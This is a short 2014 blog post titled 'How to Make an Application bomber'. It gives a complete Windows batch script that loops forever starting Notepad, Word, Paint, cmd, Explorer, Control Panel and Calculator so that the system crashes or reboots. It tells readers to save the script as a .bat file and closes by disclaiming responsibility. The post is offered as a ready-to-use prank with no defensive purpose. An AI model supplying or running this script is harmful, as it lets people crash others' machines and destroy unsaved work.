Wednesday 12 November 2014

How to Make an Application bomber

How to Make an Application bomber

How to open up many applications continuously using a loop.

 "oops! it will make the system crash immediately."

Write this program in notepad and Save as a ".bat"

@echo off
:loop
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto loop

When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots.

"I am not responsible for what you do with this Information"

0 comments:

Post a Comment